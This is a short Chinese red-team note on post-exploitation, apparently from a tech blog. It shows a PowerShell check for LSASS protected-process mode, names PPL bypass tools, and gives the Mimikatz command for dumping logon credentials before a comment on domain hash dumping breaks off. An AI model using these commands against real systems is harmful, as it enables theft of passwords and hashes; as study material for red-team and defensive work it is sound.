红队笔记 - 后渗透

2021-10-12 14:45:42 浏览数 (1)

LSASS保护

LSASS 被配置为作为受保护进程 (PPL) 运行，您可以使用 PowerShell 进行查询。

代码语言：javascript复制

Get-ItemProperty -Path HKLM:SYSTEMCurrentControlSetControlLsa -Name "RunAsPPL"

如果是这种情况，您不能只是转储或解析 LSASS，您需要使用类似mimidrv.sys，PPLDump等

使用 Mimikatz 转储操作系统凭据

代码语言：javascript复制

# Dump logon passwords
sekurlsa::logonpasswords

# Dump all domain hashes from a DC
## Note: Everything with /patch is noisy as heck since it writes to LSASS 


	

sass sas api 网络安全 安全 


	




	
 0 人点赞





		上一篇：分享雷军22年前编写的代码






最新文章

更多»


		在 C# 中获取操作系统相关信息
		AI 检索器(AI Retriever)：RAG的重要组成部分，超强的商业优势
		基于知识库、工作流的智能体实践
		前端性能优化
		玩转腾讯混元 | 腾讯混元大模型AIGC系列产品技术有奖征文活动
		Docker/DockerHub 国内镜像源/加速列表（长期维护 0926更新）
		Safari浏览器统一字体之自定义CSS样式表
		蓝牙耳机丢了，我花几分钟写了一个小程序，找到了！
		#HarmonyOS NEXT#写了一个好用的语音播报demo
		【Docker项目实战】使用Docker部署myspeed网络测速工具
		





热门手册

更多»




Svn




Ruby




Python




Php




Nodejs




Mysql




Linux




Jquery




Javascript




Java




Html




Git


 	






推荐教程

更多»


		




设计模式、高可用性、高弹性、运维、监控与自动化



		




前后端分离的思考与实践



		




Susy 2 入门教程



		




让web app更快的HTML5最佳实践



		




Stack Overflow 揭秘程式开发者15 个不为人知的秘密



		




MySQL 5.7版本新特性连载



		




Redis 基础教程



		




架构之重构的12条军规



		




learnyounode 简体中文版



		




代码之谜